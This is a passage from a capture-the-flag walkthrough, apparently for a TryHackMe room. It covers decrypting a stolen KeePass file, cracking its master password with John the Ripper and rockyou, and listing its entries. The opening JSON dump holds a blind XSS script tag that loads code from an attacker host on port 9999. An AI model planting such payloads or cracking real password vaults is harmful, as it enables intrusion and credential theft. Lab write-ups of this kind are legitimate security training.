{"filename":"papersize.clip","id":84,"key":"ODB2S0l3OHphNXJ0ZlpxNnFTWlNoZ3FncEFNdko4eWRRVlUyYWlTaW9sb05fVm5GeTBRNDVvS085QnFNd2drQw==","name":"192.168.16.53","timer":"2020-04-16T12:44:38.647069"}, {"filename":"my_keys.xls","id":76,"key":"dnYzcWJKcnk1aVFUQmd2Z0h5QURyUkpuSEpjOFVTOC5rVTE1MS5jZ2laZk9Yb21JaHl2VkZ3RU9NQ2NXamVLQQ==","name":"192.168.16.65","timer":"2020-04-16T06:43:27.542364"}, {"filename":"Your_shadow.docx","id":77,"key":"dklTN3VLZmd1VWFDaVZWeDlLWEtzd0gwcVg2TUVMcmNVak10bGFQdDZYZ29HMXVfci5DbHRwbkNRV0s5dGVKTg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.797966"}, {"filename":"No_secrets_here.txt","id":78,"key":"TTgwekpfQy5DbDZ1ckFjUERmRFRSUlJEeTdhdE10Z3k0cWZJeHNDbjhVWHJYNWlfLkN1WDRUakxEelJ3enN4Vg==","name":"10.212.134.200","timer":"2020-04-16T07:17:00.805219"}, {"filename":"magic.txt","id":86,"key":"TjMxN0R2YmVGdE5jR2pXaXpteE4wLl82VGdZUzVReDdEdjlvckhITThPOEpPM3NaRmdpWDV0OWZmOW5iU3JqWA==","name":"<script src='http://10.18.25.199:9999/noraj.js'></script>","timer":"2023-02-25T21:06:45.148785"}]}}

Data recovery#

The encrypted file we were given is Database.carp, and we can notice a file named Database.kbxd in the list.

Let's try to decrypt the file. We don't know the argument order, so we have to guess or brute-force all combinations.
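
A small shell loop can try the six orderings for us (a sketch; it assumes three positional arguments, with 'EDITED' standing for the base64 key recovered for Database.kbxd):

key='EDITED'
for a in "$key" Database.carp Database.kdbx; do
  for b in "$key" Database.carp Database.kdbx; do
    for c in "$key" Database.carp Database.kdbx; do
      # run the decrypter only when the three arguments are distinct
      [ "$a" = "$b" ] || [ "$b" = "$c" ] || [ "$a" = "$c" ] || ./decrypt_linux_amd64 "$a" "$b" "$c"
    done
  done
done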

$ ./decrypt_linux_amd64 'EDITED' Database.carp Database.kdbx
$ chmod +r Database.kdbx.decrypt
$ file Database.kdbx.decrypt
Database.kdbx.decrypt: Keepass password database 2.x KDBX

Hash cracking#

See my room on hash cracking.

  1. Extract the file hash to JtR format
  2. Find the JtR reference with haiti
  3. Crack the hash with JtR
$ keepass2john Database.kdbx.decrypt > hash.txt
$ cat hash.txt | cut -f 2 -d : | haiti -
KeePass 2 AES / without keyfile [HC: 13400] [JtR: keepass]
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=keepass

Once cracked access the Keepass database:

$ keepassxc-cli ls Database.kdbx.decrypt
Enter password to unlock Database.kdbx.decrypt:
THM
General/
Windows/
Network/
Internet/
eMail/
Homebanking/
Recycle Bin/

$ keepassxc-cli show Database.kdbx.decrypt THM --show-protected
Enter password to unlock Database.kdbx.decrypt:
Title: THM
UserName: root
Maximum depth of replacement has been reached. Entry uuid: {531b7ab3-73b9-914e-a55c-756fa66edb73}
Password: THM{EDITED}
URL:
Notes:
Uuid: {531b7ab3-73b9-914e-a55c-756fa66edb73}
Tags

Conclusion#

The idea was good but was ruined by the implementation (mostly because of PhantomJS). More pain than joy. I didn't learn much doing it. What attracted me to the challenge was the GraphQL keyword, but in the end GraphQL is marginal in this challenge; it's mostly about blind XSS. Several steps won't work unless you copy the author's payload or command exactly, and valid commands that would work in real life don't work on the challenge. I judge the challenge to be bad and I wouldn't recommend doing it.
